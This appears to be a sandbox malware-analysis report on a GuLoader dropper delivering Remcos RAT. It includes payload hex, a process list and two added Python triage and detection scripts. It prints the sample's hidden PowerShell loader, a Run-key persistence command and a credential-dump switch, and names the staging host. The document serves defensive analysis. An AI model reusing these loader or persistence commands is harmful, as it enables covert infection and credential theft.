                                    2024-09-25 14:01:29 UTC16384INData Raw: 95 40 21 b1 b0 70 39 72 f3 76 7a 8e c3 2d 15 58 2c 39 dd f9 5d 4f 8d 13 2f 42 e9 e7 1b 0c b8 5a bf 96 cf c2 a4 95 86 2e 9b f0 bf 15 d3 87 ec bd 00 37 33 49 fb 1a bc 43 bb 2c a6 48 37 2b 40 17 7c 72 fc 17 f9 2c 5b 61 f2 f4 44 e9 84 5e ec de 2d 5d 90 8e b9 c6 55 d0 7e fc 5a 11 9a 11 4d df d4 6e 73 89 bb 26 e9 09 cc a3 c9 8d 6b 6f 2f 37 e6 7d c3 80 68 aa 06 76 3a f5 df 38 f5 94 c1 34 3d f8 ca 8f 29 f0 7b 1b c8 b6 67 50 3b ee 15 78 9f e7 2a 98 ab 09 8e 60 d6 4a b1 2c 1a 04 63 5a bf 5b 29 f6 25 9a 3e f6 a7 20 9e 62 74 93 da 80 b0 71 4c 9d 34 95 5c b5 65 d9 e6 2a 66 3f c2 27 cc b7 1e ea ce 19 55 d5 37 f6 94 08 80 6e 7b a3 d5 7a 4b 55 70 a9 91 69 65 6d c7 98 fd b2 ee fa 8e 61 d3 42 bf cb b3 62 a9 ef c3 dc 13 d5 34 1e 66 a2 d2 66 96 e8 7d 94 91 64 5d d0 a5 9c be
                                    Data Ascii: @!p9rvz-X,9]O/BZ.73IC,H7+@|r,[aD^-]U~ZMns&ko/7}hv:84=){gP;x*`J,cZ[)%> btqL4\e*f?'U7n{zKUpiemaBb4ff}d]
                                    2024-09-25 14:01:29 UTC16384INData Raw: ca 72 db 98 ad 06 8b 68 7d e9 e4 c7 81 6d 46 78 2f f6 ec 09 65 95 4f d3 d1 36 4e 2b ba 33 12 f1 84 f7 1f a6 8d 06 5c 67 da 60 b3 42 3e ea 0c 32 d6 9f de 3a 45 04 ec 5c 3c 64 97 89 8e 0e d5 69 ab 6c 1d f4 63 c1 df b8 e9 47 24 00 f2 48 04 15 86 86 46 ed c5 2d 09 6c 8e 8c 3b 26 e8 b0 19 f5 fd b5 d8 9c 0e f3 e0 2a 1f 5a 36 62 24 ac fc 1d 11 35 2b 60 0d f3 22 d5 e8 42 54 30 13 ac 4e fa e9 e6 47 32 ab 94 0a 26 78 75 da e2 77 81 db b0 20 76 f6 4b dc b9 3e df ab 92 72 a2 27 1a 34 2c 57 e7 d3 7c 5e 46 5d de 4d 55 fb b6 a0 05 8b f1 9a 45 30 02 6a 87 f6 b8 bc 56 d7 7d 6a 11 ac 34 23 e4 ef c9 d0 96 4a 03 46 3a 76 fb 8f 86 66 d0 01 a5 67 85 f6 fb f2 41 ec 10 65 0d 41 0d 27 6a 58 08 ab f1 f6 c0 51 6d d1 62 a1 97 da 13 1b fd 34 05 53 ee f9 50 09 c2 97 20 8d 4a 5b 71 cd
                                    Data Ascii: rh}mFx/eO6N+3\g`B>2:E\<dilcG$HF-l;&*Z6b$5+`"BT0NG2&xuw vK>r'4,W|^F]MUE0jV}j4#JF:vfgAeA'jXQmb4SP J[q
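The stream above is the second-stage download: Conspect124.exe (not a browser, despite the Firefox User-Agent) fetches eODGqfP132.bin from cmgtrading.eu over TLS and the server answers with 494'656 bytes of application/octet-stream. The response headers carry a useful cross-check for anyone triaging the staging server: nginx's default ETag is hex(mtime)-hex(size), so "66f3cd3d-78c40" should decode to the Last-Modified time and the Content-Length, and the gap between Last-Modified and Date tells you how long the payload sat on the server before this download. The following Python is an added example (not part of the Joe Sandbox report and not the sample's code); the header block is transcribed from the stream above, nothing is fetched.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Response headers transcribed from the captured HTTPS stream (constructed input,
# copied from the report; the script never contacts cmgtrading.eu).
RESPONSE_HEADERS = """HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 14:01:28 GMT
Content-Type: application/octet-stream
Content-Length: 494656
Last-Modified: Wed, 25 Sep 2024 08:43:41 GMT
Connection: close
ETag: "66f3cd3d-78c40"
Expires: Fri, 25 Oct 2024 14:01:28 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
"""

# nginx default ETag: lowercase hex mtime, '-', lowercase hex file size.
NGINX_ETAG = re.compile(r'^"?(?P<mtime>[0-9a-f]+)-(?P<size>[0-9a-f]+)"?$')


def parse_headers(raw):
    """Return {lower-case name: value} for a raw HTTP/1.1 response header block."""
    headers = {}
    for line in raw.splitlines()[1:]:          # skip the status line
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def decode_nginx_etag(etag):
    """Decode an nginx-style ETag into (mtime as aware UTC datetime, size in bytes)."""
    m = NGINX_ETAG.match(etag.strip())
    if not m:
        return None
    mtime = datetime.fromtimestamp(int(m["mtime"], 16), tz=timezone.utc)
    return mtime, int(m["size"], 16)


def check_payload_headers(raw):
    """Cross-check ETag against Last-Modified / Content-Length and measure staging delay."""
    h = parse_headers(raw)
    decoded = decode_nginx_etag(h.get("etag", ""))
    if decoded is None:
        return {"nginx_etag": False}
    mtime, size = decoded
    last_modified = parsedate_to_datetime(h["last-modified"])
    served_at = parsedate_to_datetime(h["date"])
    return {
        "nginx_etag": True,
        "etag_mtime": mtime.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "etag_size": size,
        "size_matches_content_length": size == int(h["content-length"]),
        "mtime_matches_last_modified": mtime == last_modified,
        # hours between the file being written on the server and this download
        "staged_hours_before_download": round(
            (served_at - last_modified).total_seconds() / 3600, 2),
    }


if __name__ == "__main__":
    for key, value in check_payload_headers(RESPONSE_HEADERS).items():
        print(f"{key}: {value}")
```

For this stream both checks hold: 0x78c40 is 494656 bytes and 0x66f3cd3d is 2024-09-25 08:43:41 UTC, so the file the sandbox pulled at 14:01 UTC had been placed on the server about five hours earlier. The same decode can be run against the headers of other URLs on the host to spot payloads uploaded in the same batch.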



                                    Target ID:0
                                    Start time:09:59:00
                                    Start date:25/09/2024
                                    Path:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SDWLLRJcsY.exe"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:09:59:01
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
                                    Imagebase:0x7d0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3181422671.000000000B5DE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:59:01
                                    Start date:25/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:10:01:16
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\Conspect124.exe"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 13%, ReversingLabs
                                    Reputation:low
                                    Has exited:false

                                    Target ID:8
                                    Start time:10:01:25
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
                                    Imagebase:0x800000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:10:01:25
                                    Start date:25/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:10:01:25
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
                                    Imagebase:0xb10000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:10:01:31
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:12
                                    Start time:10:01:31
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:13
                                    Start time:10:01:32
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true
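The process list above shows the three command-line patterns that make this chain detectable without any file hash: a hidden PowerShell that reads a blob and invokes a cmdlet whose three-character name is carved out of the blob with SubString(57477,3); a REG ADD to the HKCU Run key with a REG_EXPAND_SZ value whose command is an environment variable (%Begunstigelses%) that only resolves at logon and which in turn pulls its script from HKCU:\Forseglingens\ value Drenching; and Remcos re-launching itself with /stext <tempfile> to write harvested credentials to disk. The Python below is an added example, not part of the report; it applies those three rules to process-creation records transcribed from the list above (constructed sample input, with the report's Target IDs standing in for PIDs) and pulls the persistence artefacts a responder would want to check. The report does not show what %Begunstigelses% expands to, so the script records the variable name rather than assuming a value.

```python
import re

# Process-creation records transcribed from the report's process list (constructed
# sample input: the same command lines, Target IDs used as pids).
EVENTS = [
    {"pid": 1, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"'''},
    {"pid": 7, "image": r"C:\Users\user\AppData\Local\Temp\Conspect124.exe",
     "cmd": r'"C:\Users\user\AppData\Local\Temp\Conspect124.exe"'},
    {"pid": 8, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"'''},
    {"pid": 10, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmd": r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"'''},
    {"pid": 11, "image": r"C:\Users\user\AppData\Local\Temp\Conspect124.exe",
     "cmd": r'''C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"'''},
]

# (rule name, regex over the command line, why it matters). Patterns are
# deliberately structural rather than keyed on the randomised variable names.
RULES = [
    ("powershell_substring_invocation",
     r"powershell.*-windowstyle\s+hidden.*\.SubString\(\d+,\s*3\).*\.\$\w+\(",
     "hidden PowerShell invokes a cmdlet whose name is carved from a file it just read"),
    ("run_key_expand_sz_indirection",
     r"REG\s+ADD\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b.*/t\s+REG_EXPAND_SZ.*/d\s+\"%\w+%",
     "Run-key persistence whose launcher is an environment variable expanded at logon"),
    ("remcos_stext_dump",
     r"\s/stext\s+\"[^\"]+\"",
     "process re-spawns itself with /stext <file>, the credential-dump switch seen in this report"),
]


def match_rules(events):
    """Return (pid, rule name) for every event/rule pair that fires."""
    hits = []
    for ev in events:
        for name, pattern, _why in RULES:
            if re.search(pattern, ev["cmd"], re.I | re.S):
                hits.append((ev["pid"], name))
    return hits


def parse_run_key_persistence(cmd):
    """Extract the artefacts a responder needs from the REG ADD persistence command."""
    value_name = re.search(r'/v\s+"([^"]+)"', cmd)
    launcher = re.search(r"%(\w+)%", cmd)                 # env var holding the launcher
    payload_key = re.search(r"-Path\s+'([^']+)'", cmd)   # registry key holding the script
    payload_value = re.search(r"\)\.(\w+)\s*;", cmd)      # value name under that key
    return {
        "run_value": value_name.group(1) if value_name else None,
        "launcher_env_var": launcher.group(1) if launcher else None,
        "payload_key": payload_key.group(1) if payload_key else None,
        "payload_value": payload_value.group(1) if payload_value else None,
    }


if __name__ == "__main__":
    for pid, rule in match_rules(EVENTS):
        print(f"pid {pid}: {rule}")
    print(parse_run_key_persistence(EVENTS[2]["cmd"]))
```

On the transcribed events the PowerShell rule fires on Target 1, the Run-key rule on both the cmd.exe wrapper (Target 8) and reg.exe (Target 10), and the /stext rule on Target 11; the bare Conspect124.exe launch (Target 7) stays clean, as it should. The extracted artefacts (Run value "Startup key", variable Begunstigelses, key HKCU:\Forseglingens\, value Drenching) are the places to look on a suspected host, together with the user's environment variables to learn what %Begunstigelses% resolves to.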


                                      Execution Graph

                                      Execution Coverage:24.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1353
                                      Total number of Limit Nodes:41
                                      execution_graph 3249 4015c1 3250 402c37 17 API calls 3249->3250 3251 4015c8 3250->3251 3268 405bc8 CharNextW CharNextW 3251->3268 3253 401631 3255 401663 3253->3255 3256 401636 3253->3256 3254 405b4a CharNextW 3262 4015d1 3254->3262 3258 401423 24 API calls 3255->3258 3282 401423 3256->3282 3266 40165b 3258->3266 3262->3253 3262->3254 3265 401617 GetFileAttributesW 3262->3265 3274 405819 3262->3274 3277 40577f CreateDirectoryW 3262->3277 3286 4057fc CreateDirectoryW 3262->3286 3264 40164a SetCurrentDirectoryW 3264->3266 3265->3262 3269 405be5 3268->3269 3273 405bf7 3268->3273 3271 405bf2 CharNextW 3269->3271 3269->3273 3270 405c1b 3270->3262 3271->3270 3272 405b4a CharNextW 3272->3273 3273->3270 3273->3272 3289 406626 GetModuleHandleA 3274->3289 3278 4057d0 GetLastError 3277->3278 3279 4057cc 3277->3279 3278->3279 3280 4057df SetFileSecurityW 3278->3280 3279->3262 3280->3279 3281 4057f5 GetLastError 3280->3281 3281->3279 3283 4052b0 24 API calls 3282->3283 3284 401431 3283->3284 3285 40624c lstrcpynW 3284->3285 3285->3264 3287 405810 GetLastError 3286->3287 3288 40580c 3286->3288 3287->3288 3288->3262 3290 406642 3289->3290 3291 40664c GetProcAddress 3289->3291 3295 4065b6 GetSystemDirectoryW 3290->3295 3292 405820 3291->3292 3292->3262 3294 406648 3294->3291 3294->3292 3296 4065d8 wsprintfW LoadLibraryExW 3295->3296 3296->3294 3298 401941 3299 401943 3298->3299 3300 402c37 17 API calls 3299->3300 3301 401948 3300->3301 3304 40595a 3301->3304 3343 405c25 3304->3343 3307 405982 DeleteFileW 3312 401951 3307->3312 3308 405999 3310 405ab9 3308->3310 3357 40624c lstrcpynW 3308->3357 3310->3312 3375 40658f FindFirstFileW 3310->3375 3311 4059bf 3313 4059d2 3311->3313 3314 4059c5 lstrcatW 3311->3314 3358 405b69 lstrlenW 3313->3358 3315 4059d8 3314->3315 3318 4059e8 lstrcatW 3315->3318 3320 4059f3 lstrlenW FindFirstFileW 3315->3320 3318->3320 3320->3310 3328 405a15 3320->3328 3321 405ae2 3378 405b1d lstrlenW CharPrevW 3321->3378 3324 
405a9c FindNextFileW 3324->3328 3329 405ab2 FindClose 3324->3329 3325 405912 5 API calls 3327 405af4 3325->3327 3330 405af8 3327->3330 3331 405b0e 3327->3331 3328->3324 3338 405a5d 3328->3338 3362 40624c lstrcpynW 3328->3362 3329->3310 3330->3312 3334 4052b0 24 API calls 3330->3334 3333 4052b0 24 API calls 3331->3333 3333->3312 3336 405b05 3334->3336 3335 40595a 60 API calls 3335->3338 3337 406012 36 API calls 3336->3337 3340 405b0c 3337->3340 3338->3324 3338->3335 3339 4052b0 24 API calls 3338->3339 3341 4052b0 24 API calls 3338->3341 3363 405912 3338->3363 3371 406012 MoveFileExW 3338->3371 3339->3324 3340->3312 3341->3338 3381 40624c lstrcpynW 3343->3381 3345 405c36 3346 405bc8 4 API calls 3345->3346 3347 405c3c 3346->3347 3348 40597a 3347->3348 3349 4064e0 5 API calls 3347->3349 3348->3307 3348->3308 3355 405c4c 3349->3355 3350 405c7d lstrlenW 3351 405c88 3350->3351 3350->3355 3353 405b1d 3 API calls 3351->3353 3352 40658f 2 API calls 3352->3355 3354 405c8d GetFileAttributesW 3353->3354 3354->3348 3355->3348 3355->3350 3355->3352 3356 405b69 2 API calls 3355->3356 3356->3350 3357->3311 3359 405b77 3358->3359 3360 405b89 3359->3360 3361 405b7d CharPrevW 3359->3361 3360->3315 3361->3359 3361->3360 3362->3328 3382 405d19 GetFileAttributesW 3363->3382 3366 405935 DeleteFileW 3369 40593b 3366->3369 3367 40592d RemoveDirectoryW 3367->3369 3368 40593f 3368->3338 3369->3368 3370 40594b SetFileAttributesW 3369->3370 3370->3368 3372 406033 3371->3372 3373 406026 3371->3373 3372->3338 3385 405e98 3373->3385 3376 405ade 3375->3376 3377 4065a5 FindClose 3375->3377 3376->3312 3376->3321 3377->3376 3379 405ae8 3378->3379 3380 405b39 lstrcatW 3378->3380 3379->3325 3380->3379 3381->3345 3383 40591e 3382->3383 3384 405d2b SetFileAttributesW 3382->3384 3383->3366 3383->3367 3383->3368 3384->3383 3386 405ec8 3385->3386 3387 405eee GetShortPathNameW 3385->3387 3412 405d3e GetFileAttributesW CreateFileW 3386->3412 3389 405f03 3387->3389 3390 40600d 3387->3390 3389->3390 3392 405f0b 
wsprintfA 3389->3392 3390->3372 3391 405ed2 CloseHandle GetShortPathNameW 3391->3390 3393 405ee6 3391->3393 3394 40626e 17 API calls 3392->3394 3393->3387 3393->3390 3395 405f33 3394->3395 3413 405d3e GetFileAttributesW CreateFileW 3395->3413 3397 405f40 3397->3390 3398 405f4f GetFileSize GlobalAlloc 3397->3398 3399 405f71 3398->3399 3400 406006 CloseHandle 3398->3400 3414 405dc1 ReadFile 3399->3414 3400->3390 3405 405f90 lstrcpyA 3408 405fb2 3405->3408 3406 405fa4 3407 405ca3 4 API calls 3406->3407 3407->3408 3409 405fe9 SetFilePointer 3408->3409 3421 405df0 WriteFile 3409->3421 3412->3391 3413->3397 3415 405ddf 3414->3415 3415->3400 3416 405ca3 lstrlenA 3415->3416 3417 405ce4 lstrlenA 3416->3417 3418 405cec 3417->3418 3419 405cbd lstrcmpiA 3417->3419 3418->3405 3418->3406 3419->3418 3420 405cdb CharNextA 3419->3420 3420->3417 3422 405e0e GlobalFree 3421->3422 3422->3400 3433 401e43 3441 402c15 3433->3441 3435 401e49 3436 402c15 17 API calls 3435->3436 3437 401e55 3436->3437 3438 401e61 ShowWindow 3437->3438 3439 401e6c EnableWindow 3437->3439 3440 402abf 3438->3440 3439->3440 3442 40626e 17 API calls 3441->3442 3443 402c2a 3442->3443 3443->3435 4106 402644 4107 402c15 17 API calls 4106->4107 4114 402653 4107->4114 4108 402790 4109 40269d ReadFile 4109->4108 4109->4114 4110 405dc1 ReadFile 4110->4114 4111 402792 4128 406193 wsprintfW 4111->4128 4112 4026dd MultiByteToWideChar 4112->4114 4114->4108 4114->4109 4114->4110 4114->4111 4114->4112 4116 402703 SetFilePointer MultiByteToWideChar 4114->4116 4118 4027a3 4114->4118 4119 405e1f SetFilePointer 4114->4119 4116->4114 4117 4027c4 SetFilePointer 4117->4108 4118->4108 4118->4117 4120 405e3b 4119->4120 4125 405e57 4119->4125 4121 405dc1 ReadFile 4120->4121 4122 405e47 4121->4122 4123 405e60 SetFilePointer 4122->4123 4124 405e88 SetFilePointer 4122->4124 4122->4125 4123->4124 4126 405e6b 4123->4126 4124->4125 4125->4114 4127 405df0 WriteFile 4126->4127 4127->4125 4128->4108 3458 402348 3459 402c37 17 API calls 
3458->3459 3460 402357 3459->3460 3461 402c37 17 API calls 3460->3461 3462 402360 3461->3462 3463 402c37 17 API calls 3462->3463 3464 40236a GetPrivateProfileStringW 3463->3464 4139 4016cc 4140 402c37 17 API calls 4139->4140 4141 4016d2 GetFullPathNameW 4140->4141 4142 40170e 4141->4142 4143 4016ec 4141->4143 4144 401723 GetShortPathNameW 4142->4144 4145 402abf 4142->4145 4143->4142 4146 40658f 2 API calls 4143->4146 4144->4145 4147 4016fe 4146->4147 4147->4142 4149 40624c lstrcpynW 4147->4149 4149->4142 4150 401b4d 4151 402c37 17 API calls 4150->4151 4152 401b54 4151->4152 4153 402c15 17 API calls 4152->4153 4154 401b5d wsprintfW 4153->4154 4155 402abf 4154->4155 4156 401f52 4157 402c37 17 API calls 4156->4157 4158 401f59 4157->4158 4159 40658f 2 API calls 4158->4159 4160 401f5f 4159->4160 4162 401f70 4160->4162 4163 406193 wsprintfW 4160->4163 4163->4162 4164 402253 4165 402c37 17 API calls 4164->4165 4166 402259 4165->4166 4167 402c37 17 API calls 4166->4167 4168 402262 4167->4168 4169 402c37 17 API calls 4168->4169 4170 40226b 4169->4170 4171 40658f 2 API calls 4170->4171 4172 402274 4171->4172 4173 402285 lstrlenW lstrlenW 4172->4173 4177 402278 4172->4177 4175 4052b0 24 API calls 4173->4175 4174 4052b0 24 API calls 4178 402280 4174->4178 4176 4022c3 SHFileOperationW 4175->4176 4176->4177 4176->4178 4177->4174 4177->4178 4179 401956 4180 402c37 17 API calls 4179->4180 4181 40195d lstrlenW 4180->4181 4182 40258c 4181->4182 4183 406956 4184 4067da 4183->4184 4185 407145 4184->4185 4186 406864 GlobalAlloc 4184->4186 4187 40685b GlobalFree 4184->4187 4188 4068d2 GlobalFree 4184->4188 4189 4068db GlobalAlloc 4184->4189 4186->4184 4186->4185 4187->4186 4188->4189 4189->4184 4189->4185 4190 401d57 GetDlgItem GetClientRect 4191 402c37 17 API calls 4190->4191 4192 401d89 LoadImageW SendMessageW 4191->4192 4193 401da7 DeleteObject 4192->4193 4194 402abf 4192->4194 4193->4194 4195 402dd7 4196 402e02 4195->4196 4197 402de9 SetTimer 4195->4197 4198 402e57 4196->4198 4199 
[Function call graph: the rendered graph is not recoverable as text. The residue was an edge list of numbered function nodes (addresses in the 401000-4068db range) annotated with the Windows API calls each node reaches, including registry (RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW, RegDeleteKeyW, RegDeleteValueW), file (CreateFileW, ReadFile, WriteFile, SetFilePointer, FindFirstFileW, MoveFileW, CopyFileW, DeleteFileW, SetFileAttributesW), process and privilege (CreateProcessW, ShellExecuteExW, OpenProcessToken, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess), clipboard (OpenClipboard, SetClipboardData), dynamic loading (LoadLibraryExW, GetProcAddress), COM (OleInitialize, CoCreateInstance) and dialog/window message APIs.]

                                      Control-flow Graph
                                      (• Executed / • Not Executed node colouring lost in extraction)
                                      Function entry: 40333d. Edge list omitted; the graph covers SetErrorMode, GetVersion, lstrlenA, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW, CharNextW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, DeleteFileW, OleUninitialize, lstrcatW / lstrcmpiW, SetCurrentDirectoryW, CopyFileW, CloseHandle, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx and ExitProcess (see APIs below).
                                      APIs
                                      • SetErrorMode.KERNELBASE ref: 00403360
                                      • GetVersion.KERNEL32 ref: 00403366
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                      • OleInitialize.OLE32(00000000), ref: 004033DD
                                      • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                      • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
